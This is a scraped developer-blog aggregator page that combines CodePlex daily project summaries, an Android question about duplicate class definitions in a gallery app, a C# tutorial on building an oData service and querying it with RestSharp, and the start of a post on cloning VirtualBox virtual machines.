    CodePlex Daily Summary for Tuesday, March 09, 2010New Projects.NET Excel Wrapper - Read, Write, Edit & Automate Excel Files in .NET with ease: .NET Excel Wrapper encapsulates the complexity of working with multiple Excel objects giving you one central point to do all your processing. It h...Advancement Voyage: Advancement Voyage is a high quality RPG experience that provides all the advancement and voyaging that a player could hope for.ASP.Net Routing configuration: ASP.NET routing configuration enables you to configure the routes in the web.config bbinjest: bbinjestBuildUp: BuildUp is a build number increment tool for C# .net projects. It is run as a post build step in Visual Studio.Controlled Vocabulary: This project is devoted to creating tools to assist with Controlling Vocabulary in communication. The initial delivery is an Outlook 2010 Add-in w...CycleList: A replacement for the WPF ListBox Control. Displays only a single item and allows the user to change the selected item by clicking on it once. Very...Forensic Suite: A suite of security softwareFREE DNN Chat Module for 123 Flash Chat -- Embed FREE Chat Room!: 123 Flash Chat is a live chat solution and its DotNetNuke Chat Module helps to embed a live chat room into website with DotNetNuke(DNN) integrated ...HouseFly experimental controls: Experimental controls for use in HouseFly.ICatalogAll: junkMidiStylus: MidiStylus allows you to control MIDI-enabled hardware or software using your pressure-sensitive pen tablet. The program maps the X position, Y po...myTunes: Search for your favorite artistsNColony - Pluggable Socialism?: NColony will maximize the use of MEF to create flexible application architectures through a suite of plug-in solutions. If MEF is an outlet for plu...Network Monitor Decryption Expert: NmDecrypt is a Network Monitor Expert which when given a trace with encrypted frames, a security certificate, and a passkey will create a new trace...occulo: occulo is a free steganography program, meant to embed files within images with optional encrytion. Open Ant: A implementation of a Open Source Ant which is created to show what is possible in the serious game AntMe! The First implementation of that ProjectProgramming Patterns by example: Design patterns provide solutions to common software design problems. This project will contain samples, written in c# and ruby, of each design pat...project4k: Developing bulk mail system storing email informationQuail - Selenium Remote Control Made Easy: Quail makes it easy for Quality Assurance departments write automated tests against web applications. Both HTML and Silverlight applications can b...RedBulb for XNA Framework: RedBulb is a collection of utility functions and classes that make writing games with XNA a lot easier. Key features: Console,GUI (Labels, Buttons,...RegExpress: RegExpress is a WPF application that combines interactive demos of regular expressions with slide content. This was designed for a user group prese...RemoveFolder: Small utility program to remove empty foldersScrumTFS: ScrumTFSSharePoint - Open internal link in new window list definition: A simple SharePoint list definition to render SharePoint internal links with the option to open them in a new window.SqlSiteMap4MVC: SqlSiteMapProvider for ASP.Net MVC.T Sina .NET Client: t.sina.com.cn api 新浪微博APITest-Lint-Extensions: Test Lint is a free Typemock VS 2010 Extension that finds common problems in your unit tests as you type them. 
this project will host extensions ...ThinkGearNET: ThinkGearNET is a library for easy usage of the Neurosky Mindset headset from .NET .Wiki to Maml: This project enables you to write wiki syntax and have it converted into MAML syntax for Sandcastle documentation projects.WPF Undo/Redo Framework: This project attempts to solve the age-old programmer problem of supporting unlimited undo/redo in an application, in an easily reusable manner. Th...WPFValidators: WPF Validators Validações de campos para WPFWSP Listener: The WSP listener is a windows service application which waits for new WSC and WSP files in a specific folder. If a new WSC and WSP file are added, ...New Releases.NET Excel Wrapper - Read, Write, Edit & Automate Excel Files in .NET with ease: First Release: This is the first release which includes the main library release..NET Excel Wrapper - Read, Write, Edit & Automate Excel Files in .NET with ease: Updated Version: New Features:SetRangeValue using multidimensional array Print current worksheet Print all worksheets Format ranges background, color, alig...ArkSwitch: ArkSwitch v1.1.2: This release removes all memory reporting information, and is focused on stability.BattLineSvc: V2.1: - Fixed a bug where on system start-up, it would pop up a notification box to let you know the service started. Annoying! And fixed! - Fixed the ...BuildUp: BuildUp 1.0 Alpha 1: Use at your own risk!Not yet feature complete. Basic build incrementing and attribute overriding works. Still working on cascading build incremen...Controlled Vocabulary: 1.0.0.1: Initial Alpha Release. System Requirements Outlook 2010 .Net Framework 3.5 Installation 1. Close Outlook (Use Task Manager to ensure no running i...CycleList: CycleList: The binaries contain the .NET 3.5 DLL ONLY. Please download source for usage examples.FluentNHibernate.Search: 0.3 Beta: 0.3 Beta take the following changes : Mappings : - Field Mapping without specifying "Name" - Id Mapping without specifiying "Field" - Builtin Anal...FREE DNN Chat Module for 123 Flash Chat -- Embed FREE Chat Room!: 123 Flash Chat DNN Chat Module: With FREE DotNetNuke Chat Module of 123 Flash Chat, webmaster will be assist to add a chat room into DotNetNuke instantly and help to attract more ...GameStore League Manager: League Manager 1.0 release 3: This release includes a full installer so that you can get your league running faster and generate interest quicker.iExporter - iTunes playlist exporting: iExporter gui v2.3.1.0 - console v1.2.1.0: Paypal donate! Solved a big bug for iExporter ( Gui & Console ) When a track isn't located under the main iTunes library, iExporter would crash! ...jQuery.cssLess: jQuery.cssLess 0.3: New - Removed the dependency from XRegExp - Added comment support (both CSS style and C style) - Optimised it for speed - Added speed test TOD...jQuery.cssLess: jQuery.cssLess 0.4: NEW - @import directive - preserving of comments in the resulting CSS - code refactoring - more class oriented approach TODO - implement operation...MapWindow GIS: MapWindow 6.0 msi (March 8): Rewrote the shapefile saving code in the indexed case so that it uses the shape indices rather than trying to create features. 
This should allow s...MidiStylus: MidiStylus 0.5.1: MidiStylus Beta 0.5.1 This release contains basic functionality for transmitting MIDI data based on X position, Y position, and pressure value rea...MiniTwitter: 1.09.1: MiniTwitter 1.09.1 更新内容 修正 URL に & が含まれている時に短縮 URL がおかしくなるバグを修正Mosaictor: first executable: .exe file of the app in its current state. Mind you that this will likely be highly unstable due to heaps of uncaught errors.MvcContrib a Codeplex Foundation project: T4MVC: T4MVC is a T4 template that generates strongly typed helpers for ASP.NET MVC. You can download it below, and check out the documention here.N2 CMS: 2.0 beta: Major Changes ASP.NET MVC 2 templates Refreshed management UI LINQ support Performance improvements Auto image resize Upgrade Make a comp...NotesForGallery: ASP.NET AJAX Photo Gallery Control: NotesForGallery 2.0: PresentationNotesForGallery is an open source control on top of the Microsoft ASP.NET AJAX framework for easy displaying image galleries in the as...occulo: occulo 0.1 binaries: Windows binaries. Tested on Windows XP SP2.occulo: occulo 0.1 source: Initial source release.Open NFe: DANFE 1.9.5: Ajuste de layout e correção dos campos de ISS.patterns & practices Web Client Developer Guidance: Web Application Guidance -- March 8th Drop: This iteration we focused on documentation and bug fixes.PoshConsole: PoshConsole 2.0 Beta: With this release, I am refocusing PoshConsole... It will be a PowerShell 2 host, without support for PowerShell 1.0 I have used some of the new P...Quick Performance Monitor: QPerfmon 1.1: Now you can specify different updating frequencies.RedBulb for XNA Framework: Cipher Puzzle (Sample) Creators Club Package: RedBulb Sample Game: Cipher Puzzle http://bayimg.com/image/galgfaacb.jpgRedBulb for XNA Framework: RedBulbStarter (Base Code): This is the code you need to start with. Quick Start Guide: Download the latest version of RedBulb: http://redbulb.codeplex.com/releases/view/415...RoTwee: RoTwee 7.0.0.0 (Alpha): Now this version is under improvement of code structure and may be buggy. However movement of rotation is quite good in this version thanks to clea...SCSI Interface for Multimedia and Block Devices: Release 9 - Improvements and Bug Fixes: Changes I have made in this version: Fixed INQUIRY command timeout problem Lowered ISOBurn's memory usage significantly by not explicitly setting...SharePoint - Open internal link in new window list definition: Open link in new window list definition: First release, with english and italian localization supportSharePoint Outlook Connector: Version 1.2.3.2: Few bug fixing and some ui enhancementsSysI: sysi, release build: Better than ever -- now allows for escalation to adminThe Silverlight Hyper Video Player [http://slhvp.com]: Beta 1: Beta (1.1) The code is ready for intensive testing. 
I will update the code at least every second day until we are ready to freeze for V1, which wi...Truecrafting: Truecrafting 0.52: fixed several trinkets that broke just before i released 0.51, sorry fixed water elemental not doing anything while summoned if not using glyph o...Truecrafting: Truecrafting 0.53: fixed mp5 calculations when gear contained mp5 and made the formulas more efficient no need to rebuild profiles with this release if placed in th...umbracoSamplePackageCreator (beta): Working Beta: For Visual Studio 2008 creating packages for Umbraco 4.0.3.VCC: Latest build, v2.1.30307.0: Automatic drop of latest buildVCC: Latest build, v2.1.30308.0: Automatic drop of latest buildVOB2MKV: vob2mkv-1.0.3: This is a maintenance update of the VOB2MKV utility. The MKVMUX filter now describes the cluster locations using a separate SeekHead element at th...WPFValidators: WPFValidators 1.0 Beta: Primeira versão do componente ainda em Beta, pode ser utilizada em produção pois esta funcionando bem e as futuras alterações não sofreram muito im...WSDLGenerator: WSDLGenerator 0.0.06: - Added option to generate SharePoint compatible *disco.aspx file. - Changed commandline optionsWSP Listener: WSP Listener version 1.0.0.0: First version of the WSP Listener includes: Easy cop[y paste installation of WSP solutions Extended logging E-mail when installation is finish...Yet another pali text reader: Pali Text Reader App v1.1: new features/updates + search history is now a tab + format codes in dictionary + add/edit terms in the dictionary + pali keyboard inserts symbols...Most Popular ProjectsMetaSharpi4o - Indexed LINQResExBraintree Client LibraryGeek's LibrarySharepoint Feature ManagerConfiguration ManagementOragon Architecture SqlBuilderTerrain Independant Navigating Automaton v2.0WBFS ManagerMost Active ProjectsUmbraco CMSRawrSDS: Scientific DataSet library and toolsBlogEngine.NETjQuery Library for SharePoint Web ServicesFasterflect - A Fast and Simple Reflection APIFarseer Physics Enginepatterns & practices – Enterprise LibraryTeam FTW - Software ProjectIonics Isapi Rewrite Filter

    Read the article

  • Class Issue (The type XXX is already defined )

    - by Android Stack
    I have a ListView app for exploring cities; each row points to a different city, and each city activity includes a button that, when clicked, opens a new activity containing an infinite gallery with pictures of that city. I added the infinite gallery to the first city and it works fine, but when I add it to the second city I get red-mark errors in the class as follows: 1- The type InfiniteGalleryAdapter is already defined. 2- The type InfiniteGallery is already defined. I tried changing the class names, with the same result; I deleted R.java and let Eclipse rebuild it, same result; I also unchecked the Java builder in the project properties and still got the same red-mark errors. Any help and advice will be appreciated, thanks. My code: public class SecondCity extends Activity { /** Called when the activity is first created. */ @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); Boolean customTitleSupported = requestWindowFeature(Window.FEATURE_CUSTOM_TITLE); // Set the layout to use setContentView(R.layout.main); if (customTitleSupported) { getWindow().setFeatureInt(Window.FEATURE_CUSTOM_TITLE,R.layout.custom_title); TextView tv = (TextView) findViewById(R.id.tv); Typeface face=Typeface.createFromAsset(getAssets(),"BFantezy.ttf"); tv.setTypeface(face); tv.setText("MY PICTURES"); } InfiniteGallery galleryOne = (InfiniteGallery) findViewById(R.id.galleryOne); galleryOne.setAdapter(new InfiniteGalleryAdapter(this)); } } class InfiniteGalleryAdapter extends BaseAdapter { **//red mark here (InfiniteGalleryAdapter)** private Context mContext; public InfiniteGalleryAdapter(Context c, int[] imageIds) { this.mContext = c; } public int getCount() { return Integer.MAX_VALUE; } public Object getItem(int position) { return position; } public long getItemId(int position) { return position; } private LayoutInflater inflater=null; public InfiniteGalleryAdapter(Context a) { this.mContext = a; inflater = (LayoutInflater)mContext.getSystemService ( Context.LAYOUT_INFLATER_SERVICE); } public class ViewHolder{ public TextView text; public ImageView image; } private int[] images = { R.drawable.pic_1, R.drawable.pic_2, R.drawable.pic_3, R.drawable.pic_4, R.drawable.pic_5 }; private String[] name = { "This is first picture (1) " , "This is second picture (2)", "This is third picture (3)", "This is fourth picture (4)", " This is fifth picture (5)", }; public View getView(int position, View convertView, ViewGroup parent) { ImageView i = getImageView(); int itemPos = (position % images.length); try { i.setImageResource(images[itemPos]); ((BitmapDrawable) i.getDrawable()). setAntiAlias (true); } catch (OutOfMemoryError e) { Log.e("InfiniteGalleryAdapter", "Out of memory creating imageview.
Using empty view.", e); } View vi=convertView; ViewHolder holder; if(convertView==null){ vi = inflater.inflate(R.layout.gallery_items, null); holder=new ViewHolder(); holder.text=(TextView)vi.findViewById(R.id.textView1); holder.image=(ImageView)vi.findViewById(R.id.image); vi.setTag(holder); } else holder=(ViewHolder)vi.getTag(); holder.text.setText(name[itemPos]); final int stub_id=images[itemPos]; holder.image.setImageResource(stub_id); return vi; } private ImageView getImageView() { ImageView i = new ImageView(mContext); return i; } } class InfiniteGallery extends Gallery { **//red mark here (InfiniteGallery)** public InfiniteGallery(Context context) { super(context); init(); } public InfiniteGallery(Context context, AttributeSet attrs) { super(context, attrs); init(); } public InfiniteGallery(Context context, AttributeSet attrs, int defStyle) { super(context, attrs, defStyle); init(); } private void init(){ // These are just to make it look pretty setSpacing(25); setHorizontalFadingEdgeEnabled(false); } public void setResourceImages(int[] name){ setAdapter(new InfiniteGalleryAdapter(getContext(), name)); setSelection((getCount() / 2)); } }

    Read the article

  • CodePlex Daily Summary for Tuesday, November 15, 2011

    CodePlex Daily Summary for Tuesday, November 15, 2011Popular ReleasesTHE NVL Maker: The NVL Maker Ver 3.10: 3.10 ??? ???: ·????????? ·????????? ·???“TJS”?“??”“EXP”?????“???”,???????? ·???“????”???,???????@if~@elsif~@else~@endif????? ·TJS????????? ·???????????else?endif??? ??: ·???FantasyDR?????????Wizard.exe(?????:http://code.google.com/p/nvlmaker-wizard/) ·KAGConfigEx2.exe??(?????:http://kcddp.keyfc.net/bbs/viewthread.php?tid=1374&extra=page%3D1) ·??????????skin??? ????: ·mapbutton????EXP??(??macro_map.ks) ·??????????AnimPlayer.ks?system????(??????AnimPlayer.ks???macro.ks) ·??????????????,?????...CreateHandouts: Latest Version: Latest VersionSQL Monitor - tracking sql server activities: SQLMon 4.1 alpha2: 1. improved object search, escape special characters, support search histories, and remember search option. 2. allow user to set connection time out. 3. allow user to drag & drop sql text or file to editors.SCCM Client Actions Tool: SCCM Client Actions Tool v0.8: SCCM Client Actions Tool v0.8 is currently the latest version. It comes with following changes since last version: Added "Wake On LAN" action. WOL.EXE is now included. Added new action "Get all active advertisements" to list all machine based advertisements on remote computers. Added new action "Get all active user advertisements" to list all user based advertisements for logged on users on remote computers. Added config.ini setting "enablePingTest" to control whether ping test is ru...Windows Azure SDK for PHP: Windows Azure SDK for PHP v4.0.4: INSTALLATION Windows Azure SDK for PHP requires no special installation steps. Simply download the SDK, extract it to the folder you would like to keep it in, and add the library directory to your PHP include_path. INSTALLATION VIA PEAR Maarten Balliauw provides an unofficial PEAR channel via http://www.pearplex.net. Here's how to use it: New installation: pear channel-discover pear.pearplex.net pear install pearplex/PHPAzure Or if you've already installed PHPAzure before: pear upgrade p...QuickGraph, Graph Data Structures And Algorithms for .Net: 3.6.61116.0: Portable library build that allows to use QuickGraph in any .NET environment: .net 4.0, silverlight 4.0, WP7, Win8 Metro apps.Devpad: 4.7: Whats new for Devpad 4.7: New export to Rich Text New export to FlowDocument Minor Bug Fix's, improvements and speed upsWeapsy: 0.4.1 Alpha: Edit Text bug fixedDesktop Google Reader: 1.4.2: This release remove the like and the broadcast buttons as Google Reader stopped supporting them (no, we don't like this decission...) 
Additionally and to have at least a small plus: the login window now automaitcally logs you in if you stored username and passwort (no more extra click needed) Finally added WebKit .NET to the about window and removed Awesomium MD5-Hash: 5fccf25a2fb4fecc1dc77ebabc8d3897 SHA-Hash: d44ff788b123bd33596ad1a75f3b9fa74a862fdbFluent Validation for .NET: 3.2: Changes since 3.1: Fixed issue #7084 (NotEmptyValidator does not work with EntityCollection<T>) Fixed issue #7087 (AbstractValidator.Custom ignores RuleSets and always runs) Removed support for WP7 for now as it doesn't support co/contravariance without crashing.RDRemote: Remote Desktop remote configurator V 1.0.0: Remote Desktop remote configurator V 1.0.0Rawr: Rawr 4.2.7: This is the Downloadable WPF version of Rawr!For web-based version see http://elitistjerks.com/rawr.php You can find the version notes at: http://rawr.codeplex.com/wikipage?title=VersionNotes Rawr AddonWe now have a Rawr Official Addon for in-game exporting and importing of character data hosted on Curse. The Addon does not perform calculations like Rawr, it simply shows your exported Rawr data in wow tooltips and lets you export your character to Rawr (including bag and bank items) like Char...VidCoder: 1.2.2: Updated Handbrake core to svn 4344. Fixed the 6-channel discrete mixdown option not appearing for AAC encoders. Added handling for possible exceptions when copying to the clipboard, added retries and message when it fails. Fixed issue with audio bitrate UI not appearing sometimes when switching audio encoders. Added extra checks to protect against reported crashes. Added code to upgrade encoding profiles on old queued items.Media Companion: MC 3.422b Weekly: Ensure .NET 4.0 Full Framework is installed. (Available from http://www.microsoft.com/download/en/details.aspx?id=17718) Ensure the NFO ID fix is applied when transitioning from versions prior to 3.416b. (Details here) TV Show Resolutions... Made the TV Shows folder list sorted. Re-visibled 'Manually Add Path' in Root Folders. Sorted list to process during new tv episode search Rebuild Movies now processes thru folders alphabetically Fix for issue #208 - Display Missing Episodes is not popu...DotSpatial: DotSpatial Release Candidate 1 (1.0.823): Supports loading extensions using System.ComponentModel.Composition. DemoMap compiled as x86 so that GDAL runs on x64 machines. How to: Use an Assembly from the WebBe aware that your browser may add an identifier to downloaded files which results in "blocked" dll files. You can follow the following link to learn how to "Unblock" files. Right click on the zip file before unzipping, choose properties, go to the general tab and click the unblock button. http://msdn.microsoft.com/en-us/library...XPath Visualizer: XPathVisualizer v1.3 Latest: This is v1.3.0.6 of XpathVisualizer. This is an update release for v1.3. These workitems have been fixed since v1.3.0.5: 7429 7432 7427MSBuild Extension Pack: November 2011: Release Blog Post The MSBuild Extension Pack November 2011 release provides a collection of over 415 MSBuild tasks. 
A high level summary of what the tasks currently cover includes the following: System Items: Active Directory, Certificates, COM+, Console, Date and Time, Drives, Environment Variables, Event Logs, Files and Folders, FTP, GAC, Network, Performance Counters, Registry, Services, Sound Code: Assemblies, AsyncExec, CAB Files, Code Signing, DynamicExecute, File Detokenisation, GU...Extensions for Reactive Extensions (Rxx): Rxx 1.2: What's NewRelated Work Items Please read the latest release notes for details about what's new. Content SummaryRxx provides the following features. See the Documentation for details. Many IObservable<T> extension methods and IEnumerable<T> extension methods. Many useful types such as ViewModel, CommandSubject, ListSubject, DictionarySubject, ObservableDynamicObject, Either<TLeft, TRight>, Maybe<T> and others. Various interactive labs that illustrate the runtime behavior of the extensio...Facebook C# SDK: v5.3.2: This is a RTW release which adds new features and bug fixes to v5.2.1. Query/QueryAsync methods uses graph api instead of legacy rest api. removed dependency from Code Contracts enabled Task Parallel Support in .NET 4.0+ (experimental) added support for early preview for .NET 4.5 (binaries not distributed in codeplex nor nuget.org, will need to manually build from Facebook-Net45.sln) added additional method overloads for .NET 4.5 to support IProgress<T> for upload progress added ne...Delete Inactive TS Ports: List and delete the Inactive TS Ports: UPDATEAdded support for windows 2003 servers and removed some null reference errors when the registry key was not present List and delete the Inactive TS Ports - The InactiveTSPortList.EXE accepts command line arguments The InactiveTSPortList.Standalone.WithoutPrompt.exe runs as a standalone exe without the need for any command line arguments.New ProjectsAFNC: testArithmetics: arithmetics for silverlight use note pattern by time streamAzon.Library: A collection of extensions, static helpers, AOP attributes. More will added as the project will go on.Chat TextBlock Control: A windows phone 7.1 control Resemble those chat balloon textblocks in the SMS appDiamond Framework: Diamond Framework an Common framework for Diamond Group.DNN Social Helpers: DNN Social HelpersDragon: DragonEasy Video Cropper: A simple application to make cropping videos easy for anyone. - Automatically detects black lines - Uses FFMPEGFluent Resource Mapper: This project aims to develop a framework to assist the internationalization of software using the paradigm Convetion over Configuration.Fully Observable: This project is to create an improved set of observable collections. It provides notifications for when items inside the collection change as well as when the collection itself changes.grpcmnq: no summary at allMathTool: Math tool for silverlight we plan will heve three point .matrix .differential equation .equation of locusnopCommerce Buckaroo payment provider plugin: This is a payment provider plugin for the dutch payment provider BUCKAROO. 
This plugin is developed and tested for nopCommerce version 2+ Phoenix MVVM+C Framework: Phoenix MVVM+C Framework PowerLib: PowerLib extends system .net library.RDRemote: This utility allows you to enable Remote Desktop connections from a remote computer using WMI.Sencha Touch Mini Workflow Framework: A workflow framework for Sencha Touch mobile apps including automatic component management ShWP: helper library for Windows PhoneTimer, Cronômetro e Despertador: Project developed in the C# extension course at UFSCar SorocabaUtilityLibrary.Ajax: AjaxUtilityLibrary.Email: emailUtilityLibrary.FormBase: UtilityLibrary.FormBaseUtilityLibrary.Http: UtilityLibrary for HttpWebRequestUtilityLibrary.Ormapping: ormappingVoiceModel: VoiceModel is a project which makes it easier to develop VoiceXML applications using ASP.Net MVC with Razor. It uses the MVVM (Model-View-VoiceModel) design pattern to abstract the voice application to a higher level. It is developed in C# and Razor.WebSite.Request: WebSite.Request launches a web request (via XMLHTTP) on a website. Use it, for example, to make an initial request to a SharePoint URL and escape the "slow first request" problem.Where's my lei, man?: Where's my lei, man?Zombsquare: Sample application for Windows Phone used in the Windows Phone Roadshow held in Spain in 2011; in this solution you will find examples of: -Design in Blend -BingMaps -Geolocation -Augmented Reality -Converters -Mini-trivia -Object serialization ... surviving a Zombie apocalypse...

    Read the article

  • Restful Services, oData, and RestSharp

    - by jkrebsbach
    After a great presentation by Jason Sheehan at MDC about RestSharp, I decided to implement it. RestSharp is a .Net framework for consuming restful data sources via either Json or XML. My first step was to put together a Restful data source for RestSharp to consume. Staying entirely within .Net, I decided to use Microsoft's oData implementation, built on System.Data.Services.DataServices. Natively, these support Json or atom+pub XML (XML with a few bells and whistles added on).

    There are three main steps for creating an oData data source:

    1) Override CreateDSPMetaData. This is where the metadata is returned. The metadata defines the structure of the data to return. The structure contains the relationships between data objects, along with what properties the objects expose. The metadata can and should be cached somehow so that the structure is not rebuilt with every data request.

    2) Override CreateDataSource. The context contains the data the data source will publish. This method is the conduit which will populate the metadata objects to be returned to the requestor.

    3) Implement static InitializeService. At this point we can set up security, along with setting up properties of the web service (versioning, etc.).

    Here is a web service which publishes stock prices for various Products (stocks) in various Categories.

    namespace RestService
    {
        public class RestServiceImpl : DSPDataService<DSPContext>
        {
            private static DSPContext _context;
            private static DSPMetadata _metadata;

            /// <summary>
            /// Populate traversable data source
            /// </summary>
            /// <returns></returns>
            protected override DSPContext CreateDataSource()
            {
                if (_context == null)
                {
                    _context = new DSPContext();

                    Category utilities = new Category(0);
                    utilities.Name = "Electric";
                    Category financials = new Category(1);
                    financials.Name = "Financial";

                    IList products = _context.GetResourceSetEntities("Products");

                    Product electric = new Product(0, utilities);
                    electric.Name = "ABC Electric";
                    electric.Description = "Electric Utility";
                    electric.Price = 3.5;
                    products.Add(electric);

                    Product water = new Product(1, utilities);
                    water.Name = "XYZ Water";
                    water.Description = "Water Utility";
                    water.Price = 2.4;
                    products.Add(water);

                    Product banks = new Product(2, financials);
                    banks.Name = "FatCat Bank";
                    banks.Description = "A bank that's almost too big";
                    banks.Price = 19.9; // This will never get to the client
                    products.Add(banks);

                    IList categories = _context.GetResourceSetEntities("Categories");
                    categories.Add(utilities);
                    categories.Add(financials);

                    utilities.Products.Add(electric);
                    utilities.Products.Add(water);
                    financials.Products.Add(banks);
                }
                return _context;
            }

            /// <summary>
            /// Setup rules describing published data structure - relationships between data,
            /// key field, other searchable fields, etc.
            /// </summary>
            /// <returns></returns>
            protected override DSPMetadata CreateDSPMetadata()
            {
                if (_metadata == null)
                {
                    _metadata = new DSPMetadata("DemoService", "DataServiceProviderDemo");

                    // Define entity type product
                    ResourceType product = _metadata.AddEntityType(typeof(Product), "Product");
                    _metadata.AddKeyProperty(product, "ProductID");
                    // Only add properties we wish to share with end users
                    _metadata.AddPrimitiveProperty(product, "Name");
                    _metadata.AddPrimitiveProperty(product, "Description");

                    EntityPropertyMappingAttribute att = new EntityPropertyMappingAttribute("Name",
                        SyndicationItemProperty.Title, SyndicationTextContentKind.Plaintext, true);
                    product.AddEntityPropertyMappingAttribute(att);
                    att = new EntityPropertyMappingAttribute("Description",
                        SyndicationItemProperty.Summary, SyndicationTextContentKind.Plaintext, true);
                    product.AddEntityPropertyMappingAttribute(att);

                    // Define products as a set of product entities
                    ResourceSet products = _metadata.AddResourceSet("Products", product);

                    // Define entity type category
                    ResourceType category = _metadata.AddEntityType(typeof(Category), "Category");
                    _metadata.AddKeyProperty(category, "CategoryID");
                    _metadata.AddPrimitiveProperty(category, "Name");
                    _metadata.AddPrimitiveProperty(category, "Description");

                    // Define categories as a set of category entities
                    ResourceSet categories = _metadata.AddResourceSet("Categories", category);

                    att = new EntityPropertyMappingAttribute("Name",
                        SyndicationItemProperty.Title, SyndicationTextContentKind.Plaintext, true);
                    category.AddEntityPropertyMappingAttribute(att);
                    att = new EntityPropertyMappingAttribute("Description",
                        SyndicationItemProperty.Summary, SyndicationTextContentKind.Plaintext, true);
                    category.AddEntityPropertyMappingAttribute(att);

                    // A product has a category, a category has products
                    _metadata.AddResourceReferenceProperty(product, "Category", categories);
                    _metadata.AddResourceSetReferenceProperty(category, "Products", products);
                }
                return _metadata;
            }

            /// <summary>
            /// Based on the requesting user, can set up permissions to Read, Write, etc.
            /// </summary>
            /// <param name="config"></param>
            public static void InitializeService(DataServiceConfiguration config)
            {
                config.SetEntitySetAccessRule("*", EntitySetRights.All);
                config.DataServiceBehavior.MaxProtocolVersion = DataServiceProtocolVersion.V2;
                config.DataServiceBehavior.AcceptProjectionRequests = true;
            }
        }
    }

    The objects prefixed with DSP come from the samples on the oData site: http://www.odata.org/developers The products and categories objects are POCO business objects with no special modifiers.

    Three main options are available for defining the MetaData of data sources in .Net:

    1) Generate an Entity Data Model (potentially directly from a SQL Server database). This requires the least amount of manual interaction, and uses the edmx WYSIWYG editor to generate a data model. This can be directly tied to the SQL Server database and generated from the database if you want a data access layer tightly coupled with your database.

    2) Object model decorations. If you already have a POCO data layer, you can decorate your objects with properties to statically inform the compiler how the objects are related. The disadvantage is that there are now tags strewn about your business layer that need to be updated as the business rules change.

    3) Programmatically construct the metadata object. This is the object illustrated above in CreateDSPMetaData. This puts all relationship information into one central programmatic location. Here business rules are constructed when the DSPMetaData response object is returned.

    Once you have your service up and running, RestSharp is designed for XML / Json, along with the native Microsoft library. There are currently some differences between the XML format RestSharp expects and how atom+pub works, so I found better results currently with the Json implementation - modifying the RestSharp XML parser to make an atom+pub parser is fairly trivial though, so use whichever implementation works best for you.

    I put together a sample console app which calls the RestServiceImpl.svc service defined above (and assumes it to be running on port 2000). I used both RestSharp as a client, and also the default Microsoft oData client tools.

    namespace RestConsole
    {
        class Program
        {
            private static DataServiceContext _ctx;

            private enum DemoType
            {
                Xml,
                Json
            }

            static void Main(string[] args)
            {
                // Microsoft implementation
                _ctx = new DataServiceContext(new System.Uri("http://localhost:2000/RestServiceImpl.svc"));
                var msProducts = RunQuery<Product>("Products").ToList();
                var msCategory = RunQuery<Category>("/Products(0)/Category").AsEnumerable().Single();
                var msFilteredProducts = RunQuery<Product>("/Products?$filter=length(Name) ge 4").ToList();

                // RestSharp implementation
                DemoType demoType = DemoType.Json;
                var client = new RestClient("http://localhost:2000/RestServiceImpl.svc");
                client.ClearHandlers(); // Remove all available handlers

                // Set up handler depending on what situation dictates
                if (demoType == DemoType.Json)
                    client.AddHandler("application/json", new RestSharp.Deserializers.JsonDeserializer());
                else if (demoType == DemoType.Xml)
                {
                    client.AddHandler("application/atom+xml", new RestSharp.Deserializers.XmlDeserializer());
                }

                var request = new RestRequest();
                if (demoType == DemoType.Json)
                    request.RootElement = "d"; // service root element for json
                else if (demoType == DemoType.Xml)
                {
                    request.XmlNamespace = "http://www.w3.org/2005/Atom";
                }

                // Return all products
                request.Resource = "/Products?$orderby=Name";
                RestResponse<List<Product>> productsResp = client.Execute<List<Product>>(request);
                List<Product> products = productsResp.Data;

                // Find category for product with ProductID = 1
                request.Resource = string.Format("/Products(1)/Category");
                RestResponse<Category> categoryResp = client.Execute<Category>(request);
                Category category = categoryResp.Data;

                // Specialized queries
                request.Resource = string.Format("/Products?$filter=ProductID eq {0}", 1);
                RestResponse<Product> productResp = client.Execute<Product>(request);
                Product product = productResp.Data;

                request.Resource = string.Format("/Products?$filter=Name eq '{0}'", "XYZ Water");
                productResp = client.Execute<Product>(request);
                product = productResp.Data;
            }

            private static IEnumerable<TElement> RunQuery<TElement>(string queryUri)
            {
                try
                {
                    return _ctx.Execute<TElement>(new Uri(queryUri, UriKind.Relative));
                }
                catch (Exception ex)
                {
                    throw ex;
                }
            }
        }
    }

    Feel free to step through the code a few times, and to attach a debugger to the service as well, to see how and where the context and metadata objects are constructed and returned. Pay special attention to the response object being returned by the oData service - there are several properties of the RestRequest that can be used to help troubleshoot when the structure of the response is not exactly what would be expected.
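
    As a footnote to option 2 above (object model decorations), here is a minimal sketch of what a decorated POCO might look like when exposed through the standard WCF Data Services reflection provider instead of the programmatic DSPMetadata approach. The ProductsContext class, its sample data and the ProductsService name are assumptions added for illustration; only the Product shape (ProductID, Name, Description) comes from the article.

    using System;
    using System.Collections.Generic;
    using System.Data.Services;        // DataService<T>, DataServiceConfiguration
    using System.Data.Services.Common; // DataServiceKeyAttribute, DataServiceProtocolVersion
    using System.Linq;

    namespace RestService.ReflectionProvider
    {
        // The attribute on the POCO tells the reflection provider which property is the key.
        [DataServiceKey("ProductID")]
        public class Product
        {
            public int ProductID { get; set; }
            public string Name { get; set; }
            public string Description { get; set; }
        }

        // Hypothetical context: each IQueryable<T> property becomes an entity set.
        public class ProductsContext
        {
            private static readonly List<Product> _products = new List<Product>
            {
                new Product { ProductID = 0, Name = "ABC Electric", Description = "Electric Utility" },
                new Product { ProductID = 1, Name = "XYZ Water", Description = "Water Utility" }
            };

            public IQueryable<Product> Products
            {
                get { return _products.AsQueryable(); }
            }
        }

        // The service itself stays small; the metadata is inferred from the attributes.
        public class ProductsService : DataService<ProductsContext>
        {
            public static void InitializeService(DataServiceConfiguration config)
            {
                config.SetEntitySetAccessRule("Products", EntitySetRights.AllRead);
                config.DataServiceBehavior.MaxProtocolVersion = DataServiceProtocolVersion.V2;
            }
        }
    }

    The trade-off is the one noted above: the key and relationship hints now live as attributes on the business objects themselves rather than in one central CreateDSPMetaData method.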

    Read the article

  • Begin the Clone Wars Have!

    - by Antony Reynolds
    Creating a New Virtual Machine from an Existing Virtual Disk

    In previous posts I described how I set up an OEL6 machine under VirtualBox that can run an 11gR2 database and FMW 11.1.1.5.  That is great if you want the DB and FMW running in the same virtual image and it has served me well for some proof of concepts and also for some testing of different JVMs.  However I also wanted to run some testing of FMW with the database running on a separate physical machine.  So in this post I will show how to take a VirtualBox image and create a new image based on the disks from that original image.

    What are my Options?

    There is more than one way to skin a cat, or in this case to create two separate VMs that can run on different hardware.  Some of the options include:

    1. Create new virtual disk images for each new VM.
